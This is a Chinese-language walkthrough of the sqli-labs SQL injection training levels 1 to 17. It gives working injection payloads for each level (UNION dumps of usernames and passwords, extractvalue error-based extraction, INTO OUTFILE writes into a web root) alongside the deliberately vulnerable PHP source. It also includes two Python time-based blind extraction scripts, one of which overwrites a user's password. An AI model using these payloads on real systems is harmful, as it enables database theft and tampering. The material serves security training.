Less-1

payload:

?id=0' union select database(),group_concat(username),group_concat(password) from users--+

php:

// Less-1: $id (the raw ?id= value) is dropped into a single-quoted literal, so the
// payload starts with 0' to close the quote and ends with --+ (-- plus a space once
// the + is URL-decoded) to comment out the trailing ' LIMIT 0,1.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

Less-2

payload:

?id=0 union select 1,group_concat(username),group_concat(password) from users --+

php:

// Less-2: numeric context -- $id is concatenated without quotes, so the payload needs
// no quote to break out; --+ still comments out the trailing LIMIT 0,1.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

Less-3

payload:

?id=0') union select 1,group_concat(username),group_concat(password) from users --+

php:

// Less-3: the value is wrapped as ('...'), so the payload closes both quote and
// parenthesis with 0') before its UNION.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

Less-4

payload:

?id=0") union select 1,group_concat(username),group_concat(password) from users --+

php:

// Less-4: $id is first surrounded by double quotes, then placed inside parentheses,
// giving id=("...") -- hence the 0") prefix in the payload.
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

Less-5

payload:(报错注入。本关命中记录时只输出固定的 "You are in",union 的结果不会回显,只能通过 mysql_error() 把数据带出来;extractvalue() 的报错信息一次最多回显 32 个字符,把已经读到的用户名填进 `username!='...'` 条件即可继续读后面的行)

?id=0' and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找')))--+

php:

// Less-5: same single-quote context as Less-1, but the selected columns are never
// shown -- a matching row only produces the fixed "You are in" text, so UNION
// output is invisible. The else branch prints mysql_error() verbatim, which is the
// oracle the extractvalue() error-based payload relies on.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="3" color="#FFFF00">';
	// MySQL's error text is reflected into the page: the error-based channel.
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

Less-6

payload:

?id=0" and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找')))--+

php:

// Less-6: like Less-5 but the value is wrapped in double quotes, so the payload
// breaks out with 0" instead of 0'. Error reflection is the same as Less-5.
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
其余代码同 Less-5(失败时同样通过 print_r(mysql_error()) 回显报错信息)

Less-7

Method:into outfile 文件写入操作。前提:数据库账号有 FILE 权限、secure_file_priv 允许写到目标目录、目标目录对 mysqld 进程可写;路径用绝对路径,Windows 下反斜杠要转义。union 的第三列就是写入文件的内容(下面的 payload 里是空字符串 '')。payload 如下:

payload:

?id=1')) union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-7\\1.php" --+

php:

// Less-7: context is (('$id')), so the payload opens with 1')). The else branch
// prints a fixed string and mysql_error() is commented out, so neither data nor
// error text is reflected; the only feedback is "You are in" vs "You have an
// error". The write-up therefore uses SELECT ... INTO OUTFILE, which needs the
// MySQL FILE privilege and a secure_file_priv setting that permits the target path.
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	// Fixed text only -- the real MySQL error is suppressed below.
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}

Less-8

payload:

?id=1' union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-8\\1.php" --+

php:

// Less-8: single-quote context again. The else branch prints nothing visible (every
// output line in it is commented out), so the only signal is whether "You are in"
// appears: a boolean-blind oracle. No error text is reflected.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

Less-9

payload:

?id=1' union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-9\\1.php" --+

php:

// Less-9: both branches print the same "You are in" text and errors are suppressed,
// so there is neither a boolean nor an error oracle -- only timing (sleep()) or a
// side effect such as INTO OUTFILE can distinguish true from false.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	// Same message as the success branch: no visible difference.
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

Less-10

payload:

?id=1" union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-10\\1.php" --+

php:

// Less-10: double-quote variant of Less-9 (same "You are in" on both branches,
// errors suppressed). Note the 'echo $sql;' below: as pasted here the built query
// is printed to the page, handing the attacker the exact injection context --
// confirm whether that line is active in the deployed lab.
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
echo $sql;
echo "<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

Less-11

payload:(查询只取 username、password 两列,所以 union 也只能 select 两列;登录成功后页面会回显这两列,group_concat 的结果就从这里带出来,末尾用 # 注释掉后面的 and password=...)

uname: 1' union select group_concat(username),group_concat(password) from users;#

php:

// Less-11: POST login form. $uname and $passwd both land unescaped inside
// single-quoted literals. The query selects exactly two columns, so a UNION in
// uname must supply two as well; on success the page echoes $row['username'] and
// $row['password'], which is where the UNION's group_concat() output shows up.
// The '#' in the payload comments out the rest of the WHERE clause. On failure
// mysql_error() is reflected too, so error-based techniques also work.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		// First row of the (possibly UNION-extended) result is printed verbatim.
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg" />';	
		echo "</font>";  
	}

Less-12

payload:

uname: 1") union select group_concat(username),group_concat(password) from users;#

php:

// Less-12: both fields are wrapped in double quotes and then in parentheses,
// giving username=("...") -- hence the 1") prefix in the payload. Output handling
// is the same as Less-11: row columns echoed on success, mysql_error() on failure.
$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

Less-13

payload:

uname: 1') and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找' )));#

php:

// Less-13: context is ('...'), so the prefix is 1'). Unlike Less-11/12 the success
// branch no longer echoes the row (those lines are commented out), so UNION output
// is not visible; mysql_error() is still reflected on failure, which is why the
// write-up switches to extractvalue() error-based extraction here.
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		// Error text is the only data channel left on this level.
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

Less-14

payload:

uname: 1" and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找' )));#

php:

// Less-14: double-quote variant of Less-13 (username="..."), so the prefix is 1".
// Same feedback: no row data on success, mysql_error() reflected on failure.
$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg" />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"  />';	
		echo "</font>";  
	}

Less-15

Python(时间盲注:条件为真时让服务端执行 sleep(),通过响应时间判断猜测是否正确):

import requests
import time
import sys

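# config-start
sleep_time = 1    # seconds the injected sleep() runs when the guessed condition is true
error_time = 0.1  # timing tolerance (seconds) used by exce() when judging whether sleep() ran
# config-end

def getPayload(indexOfResult, indexOfChar, mid):
    """Build the POST body for one time-based guess against Less-15.

    indexOfResult: 0-based row offset (LIMIT <row>,1) of ``SELECT password FROM users``.
    indexOfChar:   1-based character position handed to substring().
    mid:           ASCII code the character is compared against.
    All three are already strings when called from doSearch(). Returns the dict
    passed to requests.post(): ``uname`` carries the injection, ``passwd`` is a
    dummy value that the trailing SQL comment makes irrelevant.
    """
    # Target of the extraction. The lab's users table exposes username and
    # password; change these two to read a different column/table.
    table_name = "users"
    column_name = "password"
    condition = "((ascii(substring((select {col} from {tbl} limit {row},1),{pos},1)))={guess})".format(
        col=column_name, tbl=table_name, row=indexOfResult, pos=indexOfChar, guess=mid)
    # Single-quote context (username='$uname'): close the quote, OR in the guess,
    # and comment out the rest. The space after "--" is required by MySQL.
    uname = "' or ((" + condition + ") and sleep(" + str(sleep_time) + "))-- "
    return {"uname": uname, "passwd": "admin"}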

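def exce(indexOfResult, indexOfChar, queryASCII):
    """Send one guess to Less-15 and report whether the server slept.

    The arguments are the string values forwarded to getPayload(). Returns
    True when the round trip took at least ``sleep_time - error_time``
    seconds, i.e. the injected condition held and sleep(sleep_time) ran;
    False otherwise. Propagates requests exceptions on connection failure
    or timeout.
    """
    # content-start
    url = "http://127.0.0.1:801/sqli/Less-15/"
    postData = getPayload(indexOfResult, indexOfChar, queryASCII)
    before_time = time.monotonic()
    # The timeout must exceed sleep_time, otherwise every correct guess
    # would raise instead of being measured.
    requests.post(url, data=postData, timeout=sleep_time + 10)
    after_time = time.monotonic()
    # content-end
    use_time = after_time - before_time
    # judge-start
    # The payload sleeps on a correct guess. With a linear scan most guesses
    # are wrong, so this keeps the common path fast; with a binary search it
    # matters much less which branch sleeps.
    # Judge against the configured sleep length minus a tolerance rather than
    # a fixed 0.1 s: ordinary network latency can exceed 0.1 s and would then
    # be misread as a hit, corrupting the extracted data.
    return use_time >= sleep_time - error_time
    # judge-end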

def doSearch(indexOfResult, indexOfChar):
    """Recover the character at 0-based position indexOfChar of result row indexOfResult.

    Candidates are tried in rough order of how often they occur in typical
    database content (lowercase, '_', uppercase, then space, punctuation and
    digits) so common characters cost few requests. Returns the matched
    character, or chr(1) when nothing matched -- the caller treats that as
    end-of-string.
    """
    candidates = (
        "abcdefghijklmnopqrstuvwxyz_"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        " !\"#$%&'()*+,-./0123456789"
        ":;<=>?@[\\]^`{|}~"
    )
    row = str(indexOfResult)
    position = str(indexOfChar + 1)  # SQL substring() positions are 1-based
    for candidate in candidates:
        if exce(row, position, str(ord(candidate))):
            return candidate
    return chr(1)

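def search(max_rows=32, max_len=32):
    """Dump the query result row by row, printing characters as they are found.

    max_rows: upper bound on result rows to try (LIMIT offsets 0..max_rows-1).
    max_len:  upper bound on characters read per row.
    A row is read until doSearch() reports no matching character (chr(1)).
    A row whose very first character is missing is taken to mean the result
    set is exhausted, and extraction stops. Output goes to stdout, one row
    per line, flushed per character so progress is visible while the slow
    time-based requests run.
    """
    for row in range(max_rows):
        found = 0
        for position in range(max_len):
            ch = doSearch(row, position)
            if ord(ch) == 1:
                break  # end of this row
            found += 1
            sys.stdout.write(ch)
            sys.stdout.flush()
        if found == 0:
            break  # nothing at this offset: every row has been dumped
        sys.stdout.write("\r\n")
        sys.stdout.flush()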

# Entry point: dumps up to 32 rows x 32 characters of users.password (see getPayload).
search()
代码来源:https://www.jianshu.com/p/e5a42373ed12

php:

// Less-15: single-quote context. Neither branch prints row data or mysql_error(),
// hence the time-based script above. Two things worth noting: 'echo $sql;' (if it
// is active in the deployed lab) prints the built query to the page, and the two
// branches still differ visibly -- flag.jpg on a matching row versus slap.jpg
// otherwise -- which is a usable boolean oracle that needs no sleep().
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	echo $sql;
	echo "<br>";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		echo "<br>";
		//echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		//print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

Less-16

把 Less-15 脚本 payload 开头的 `'` 换成 `")` 即可(Less-16 把参数包在 ("…") 里,所以要同时闭合双引号和括号)。

Less-17

php

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// Silences PHP notices/warnings; MySQL errors are still printed explicitly below.
// (mysql_* functions were removed in PHP 7, so this lab needs PHP 5.x.)
error_reporting(0);

// Sanitises ONE value for use in the SELECT below: truncates it, undoes
// magic-quotes escaping, then either escapes+quotes it (non-numeric) or casts
// it to int. Only $uname goes through this; $passwd never does.
function check_input($value)
	{
	if(!empty($value))// skip truncation for an empty value
		{
		// truncation (see comments)
		$value = substr($value,0,15);// keep only the first 15 characters
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())// with magic_quotes_gpc on, every ' " \ and NUL in request data arrives backslash-escaped; the setting was dropped in PHP 5.4 and the function always returns false from then on
		{
			$value = stripslashes($value);// remove those backslashes
		}

		// Quote if not a number
		if (!ctype_digit($value))// true only when every character is a decimal digit
		{
			$value = "'" . mysql_real_escape_string($value) . "'";// escapes NUL, \n, \r, \, ', " and Control-Z, then wraps the result in single quotes
		}
	else // NOTE: despite the indentation this else belongs to the ctype_digit check above, not to the empty() check
		{
		$value = intval($value);// purely numeric input is used as an integer
		}
	return $value;
	}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	//making sure uname is not injectable
	$uname=check_input($_POST['uname']);  // uname is escaped and quoted by check_input() above

	// passwd is taken verbatim -- this is the injection point the script below uses
	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	// Lab artifact: the submitted username and new password are appended in
	// plaintext to result.txt next to this script (presumably fetchable over HTTP).
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname."\n");
	fwrite($fp,'New Password:'.$passwd."\n");
	fclose($fp);

	// connectivity 
	@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
	// The built query is echoed to the page, revealing the exact SQL context.
	echo $sql;
	echo "<br>";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);
	//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		// Both $passwd (raw POST data) and $row1 (username read back from the
		// database) are interpolated without escaping. The time-based payload
		// rides in $passwd, e.g.:
		//   UPDATE users SET password = '1' where username='admin' and if(<cond>,sleep(3),1)#' WHERE username='admin'
		// Every probe really executes this UPDATE, so the targeted user's
		// password is overwritten in the lab database.
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";
		// Errors from the UPDATE are printed, so an error-based payload in
		// $passwd would have its error text reflected as well.
		if (mysql_error())
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			print_r(mysql_error());
			echo "</br></br>";
			echo "</font>";
		}
		else
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			//echo " You password has been successfully updated " ;		
			echo "<br>";
			echo "</font>";
		}
		echo '<img src="../images/flag1.jpg"   />';	
		//echo 'Your Password:' .$row['password'];
  		echo "</font>";
  	}
	else  
	{
		echo '<font size="4.5" color="#FFFF00">';
		//echo "Bug off you Silly Dumb hacker";
		echo "</br>";
		echo '<img src="../images/slap1.jpg"   />';
	
		echo "</font>";  
	}
}

?>

python

import requests
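# Candidate characters, tried in this order for every position. Anything not
# in this set (e.g. '-', ':' or space) cannot be recovered and shows up as '?'.
charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."
url = "http://192.168.184.1:801/sqli/Less-17/"
# Stop after this many consecutive positions with no matching character; the
# script never learns the string's length, so this is how the end is detected.
max_consecutive_misses = 3

# The injection rides in passwd, which Less-17 interpolates unescaped into
#   UPDATE users SET password = '<passwd>' WHERE username='<row>'
# A true condition runs sleep(3); the response time is the oracle.
# Earlier probes, in the order they were used to enumerate the schema:
#1' where username='admin' and if(mid((select database()),1,1)= 's',sleep(3),1)#
#1' where username='admin' and if(mid((select  database()),{},1)= '{}',sleep(3),1)#
#1' where username='admin' and if(mid((select group_concat(table_name,'') from information_schema.tables where table_schema=database()),{},1)= '{}',sleep(3),1)#
#1' where username='admin' and if(mid((select group_concat(column_name,'') from information_schema.columns where table_name='users' and table_schema=database()),{},1)= '{}',sleep(3),1)#
#1' where username='admin' and if(substr((select * from (select GROUP_CONCAT(BINARY(username),',',BINARY(password)) from users) as temp),{},1)= '{}',sleep(3),1)#
template = "1' where username='admin' and if(substr((select * from (select GROUP_CONCAT(BINARY(username),',',BINARY(password)) from users) as temp),{},1)= '{}',sleep(3),1)#"

misses = 0
for i in range(1, 200):  # 1-based position inside the group_concat() string
    for j in charset:
        data = {"uname": "admin", "passwd": template.format(i, j), "submit": "submit"}
        # The timeout must comfortably exceed the injected sleep(3), otherwise
        # a correct guess would raise instead of being measured.
        r = requests.post(url, data=data, timeout=15)
        if r.elapsed.total_seconds() > 2:  # slept -> this guess was right
            print(j, end='', flush=True)
            misses = 0
            break
    else:
        # No candidate matched this position: either the string has ended or
        # the character is outside charset. Mark it instead of silently
        # skipping, so the output stays aligned with the real string.
        misses += 1
        if misses >= max_consecutive_misses:
            break
        print('?', end='', flush=True)
print()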

加上 where username='admin' 是为了减少爆破时间:这样在改 password 的时候只会改 admin 的 password;不加也可以,只是会把所有用户的 password 都改掉,同样能达到目的。注意脚本每发一次请求这条 UPDATE 都会真正执行,admin 的密码会被改掉。最后爆破字段时用了一个派生表 temp,因为 UPDATE 和 SELECT 作用于同一张表时 MySQL 会报错:Table 'test' is specified twice, both as a target for 'UPDATE' and as a separate source for data,所以借助派生表来盲注;另外用 BINARY() 让比较区分大小写。判断依据是响应时间 r.elapsed 超过 2 秒(payload 里是 sleep(3)),网络抖动大的环境要相应调大 sleep 时间和阈值。